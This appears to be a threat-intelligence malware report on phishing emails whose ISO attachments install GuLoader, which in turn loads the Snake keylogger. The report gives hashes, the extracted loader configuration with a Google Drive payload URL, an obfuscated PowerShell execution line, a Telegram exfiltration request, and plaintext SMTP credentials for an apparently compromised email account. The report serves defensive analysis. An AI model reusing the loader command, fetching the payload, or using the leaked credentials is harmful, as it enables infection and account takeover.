---- Description ----

Messages containing ISO files containing an executable which, if executed, will install GuLoader. GuLoader was observed loading Snake keylogger

---- Example File Details ----

File Name
0556_shipment details(004072025).exe

Size
860KB
MD5
efb21df8fa4d5b199988a66752c612f8
SHA1
fe1f8de21b971e63e9d6f4414e71ddc9f4eaa61c
SHA256
2ac63283fcb86f71a94c1e51796a00bc0ebf0b41732abfdbbb6453149e1c1336

---- Malware Configuration(s) ----

Example GuLoader Configuration:

```
GuLoader Task: https://drive.google.com/uc?export=download&id=1OKgf_OFM0mgBfkm_CYUgPYoJiiA4AGff
	('PayloadKey', '13 00 82 31 F3 1B 9C 8A F4 0E EE 45 2C DE F1 58 AE 30 5A 2C 8F AD FE D5 29 82 29 65 78 BF 2D 7E 41 F7 7D 73 A3 B9 E4 B5 60 85 E3 47 37 0E 5F BE 6E BE BA EA 25 40 71 2B D5 3E 5A 6D 1E A9 A6 29 63 50 52 40 A3 A0 9A 09 ED FD C7 A7 DB 90 DC 85 63 DB 6C 6C CC 05 1B 46 86 0A 08 E2 52 D0 FD CB C8 A3 5A F9 66 22 9C C2 5D 7B 1D FD 2D E9 2E E5 AD C9 A7 E2 41 54 A7 AB C0 AD 7E 47 41 4B 0C F3 EF 17 0A A9 A6 57 0A 3B 70 26 32 37 38 F1 DB 4D 08 10 B5 29 AB EF 9E BE 19 88 6E 0F 80 81 41 88 7F BF FB 81 64 1E 54 F1 2A B8 CB 93 59 49 C6 BA D7 C1 CC AE B0 45 A7 77 66 DA 60 23 12 42 4C 43 81 98 8C A9 ED 03 6C 62 CA 4D 12 5F B3 AB 72 B7 6B 2B 86 4E B1 2C E8 FD 29 85 08 B7 AD BA BF 04 BC 05 22 87 B0 91 EE D1 43 88 8C 66 D2 69 AE 52 6A 4E F0 67 D7 5E 28 DC BC 27 3C 4C 74 AD 07 83 17 B0 EB DC 7C 9C EC 87 62 97 3A 2B EF 63 40 A2 B9 37 AC 6F C9 41 7C CD 56 BB A9 50 09 0E AB 7C 20 83 3B 20 4C 72 47 79 5F DA F2 48 A9 C0 63 DF C5 CD 37 C2 E8 6B 4B 0C AB 4E 89 59 D0 E6 32 A3 ED CF 91 8A E4 A4 E3 C3 2B 42 90 42 15 58 B0 3D 4A 11 C7 16 27 AB 1B 6F 98 CD 87 C9 67 89 DA DC 85 4F B4 07 0F E8 07 18 10 92 27 A0 DF AC AE D5 40 20 D0 65 06 96 7A 21 4C 92 F2 AF C8 56 FD A6 E9 DA 8B FC 25 FF 21 D6 89 F2 4B F3 05 60 22 9C 92 98 C0 44 BB D8 AA 5E C3 8C 18 10 08 EC D1 E5 67 0B 11 90 BA A4 A2 DF 02 47 DF 35 92 94 3D 92 50 A1 44 74 53 19 60 E5 C7 C0 EA 45 5D 1F B5 73 F0 90 78 13 BF B5 06 E2 11 4B 2D 83 12 DD 2E F0 2F 05 FE E2 23 20 60 3C A0 B1 35 B9 A9 5D BB 1D 4E B1 12 D7 3E 6D 4C 4E F8 32 3D BA FC 2B 05 1C F6 7F 8A 20 BE 99 D1 C7 BF 3D 97 E7 32 77 71 E2 A2 EA 44 A8 AD 61 3B 3E 71 66 56 F2 4C 4F 7E D5 07 62 8C 17 CF 8D B1 DC AA 48 5C A9 21 18 85 87 57 6E 36 26 BB 70 89 C8 AA 11 4C AF E2 FB C0 59 81 13 8C 15 93 11 7F DA EC 67 59 27 2E 03 4B E9 EE 62 7B F6 78 64 09 CC BD D7 7B 57 9C 19 E4 0E C6 2F 69 DF 57 15 55 79 24 6A 80 35 26 63 F6 A2 DE CF 0F 82 DA F1 BC CC C3 01 47 FF 42 7E 22 95 6F 57 81 AA 66 22 F0 81 F4 0A 8F F7 52 C8 8F 87 96 E1 92 D8 64 0D 5B F0 E9 CA E7 4D D0 31 0E 14 DA EC DF C1 54 2A B2 A1 28 F9 20 33 9D 8B F0 82 AC E8 50 FF 20 EF 85 6B 42 96 D4 72 9D FD F9 B9 E0 3C C2 6E 85 66 9D 10 B8 F7 0C 3F 76 FE 1D 17 19 45 CE 92 78 4C AC 21 B1 23 B8 95 F2 4F AE 87 86 58 E9 1D B6 4F F0 02 D0 7A EE 04 7A 7D F2 9B A3 1B 93 45 12 38 00 56 FA D5 58 64 4C 44 D0 04 F4 85 83 C3 8B D3 E6 C9 17 BA 2C A0 3C 4A 88 EB 41 28 61 85 6E E6 EE 77 51 99 22 1A 9A 0A 14 3F 94 23 DF F1 0D 5B 98 9D 39 4A 9C 21 F1 BF 2D 9D 26 BE E1 AE 05 28 97 F9 6A BC BC 91 21 73 AF 57 18 48 31 F9 50 C3 13 E9 55 67 AA B1 D7 96 88 D3 48 80 C6 D8 9F 07 FA EA E3 A5 14 90 06 16 99 CC B7 41 00 AC 54 C4 61 A5 B7 3C FB 7C F4 4C 44 F5 95 2C DD 4E C4 6F AA 6F 94 9E E7 6C C1 06 5D 0C 24 E4 FB 55 78 EF 8E 0A 55 88 A5 31 05 67 71 F5 EE 2D F4 EE A9 0E 89 FD BB A5 27 0B 8F 6C 09 CC 17 31 EA 35 33 4B 41 99 19 40 F9 39 F6 19 60 4E 17 B9 C3 04 81 DB 57 FB 08 1B EF 2D A9 62 DF 97 03 32 51 C2 BD 15 0E 40 4D CC 20 A2 C1 E6 FD 1C 77 4A F9 A0 C0 51 77 48 71 3D 39 83 27 88 D2 55 19 DF D9 EB 10 13 04 A3 8F 7E 27 BC 60 AC FC B7 78 39 DE A6 60 6F 1D F5 01 CF 89 85 6E 4B 90 77 08 10 A7 5B F3 65 01 45 E2 21 47 2E 90 E2 DD 53 82 B9 31 0A 6C B4 4F 8A A8 49 A3 91 A4 8B 1E 96 D6 FC 9A 3C 7F 92 06 2F 20 31 8B 4E 99 AC A8 14 AA FC A8 4D 99 E4 55 16 C6 C4 DE BD 02 A2 C9 FB 75 9B D2 E5 D1 9A 82 7E 4C E3 BA C3 62 08 80 F6 5D CA 4F B4 68 25 AE AB 7D 07 D5 0B 87 1D FB 0C 6F 67 83 F2 56 48 2E 81 03 E2 03 6A 70 B5 3F C1 FC 01 A0 C3 05 C0 A1 1C B2 83 31 62 11 62 2C A1 CF 0D 43 BB C0 74 C1 7D F3 04 1B 8E C6 D0 2C BA 93 71 A8 25 E4 6E 59 4A 62 97 B9 19 D0 CC C5 94 0E 68 C5 FE 8F 52 64 70 BE A4 72 CD 4F 60 8D 72 2B 14 7B E8 7D F3 75 F0 15 9C F3 82 49 1C 8E 8F 36 3B 02 52 19 DB 98 F4 6A EB 4D 53 42 55 AC F5 4A 6A 69 A4 6C BA 79 21 21 D9 0A B3 13 E7 72 C5 54 25 ED 8F 16 AC 37 68 61 9C 08 95 BC 13 4B BD 3C 96 EC AE 2E 12 54 FE 4E 3C 0A EE 88 4D 32 DA 13 C6 F7 FD 6F E6 F5 59 6E B6 A9 95 37 9C ED 4B EE 90 4A 6E 75 2C F2 A8 46 27 AF 43 81 DA 68 74 D4 49 37 3F 03 4B 67 B1 AE 8D DF F9 C5 FB 7E 2B 21 D0 30 9D 2C 59 45 BC 51 5D 72 84 DD AB A4 C9 0F 5B 6C 50 0B E4 45 75 D5 B6 80 03 8E DF E3 29 EB E1 25 D9 CF F3 51 00 2C 51 59 D0 3B E0 0B 78 76 B7 C8 69 3E F8 56 8C 08 E7 6F D3 37 58 25 FC 3B CF F4 26 6F 05 98 B0 8C D8 A7 59 3B 26 4D 46 9C 15 7C 50 03 4D CA 26 4E')
	('URLKey', 'BA B8 30 B5 C0 6F 52 9B 77 D3 87 6F C9 FD 17 1B 5B CB E2 7A 98 61 34 29 2F C4 A6 06 FA 5E 7C BC FE 9E A5 0A E2 62 58 BC 57 F0 98 E1 B6 DB BD AD')
	('INT3XORKey', '0x21')
	('INT3XOROffset', '0x07')
	('Detection', 'Powershell functions, Found in Nullsoft dropped')
	('Extraction', 'Signature: 0faee80f310faee8c1e22009')

```

vipkeylogger / Snake

Credentials

Protocol: smtp = email
Host:smtp.ionos.es
Port:587
Username:manuel@perezbotiaabogados.com
Password:botia.1236
Email To:balivirus45@gmail.com

---- Process Tree(s) ----

Processes

C:\Users\Admin\AppData\Local\Temp\0556_shipment details(004072025).exe
"C:\Users\Admin\AppData\Local\Temp\0556_shipment details(004072025).exe"
PID:5916
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle minimized "$Helenus=gc -Raw 'C:\Users\Admin\AppData\Local\Activate\Cannibalization\Distractible\Finansloven.Sup90';$Forplumringerne=$Helenus.SubString(52621,3); .$Forplumringerne($Helenus) "
PID:3232
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"

---- IOCs ---- 

https://drive.google.com/uc?export=download&id=1OKgf_OFM0mgBfkm_CYUgPYoJiiA4AGff
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:CMJXYIKL%0D%0ADate%20and%20Time:%207/29/2025%20/%204:19:21%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20CMJXYIKL%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
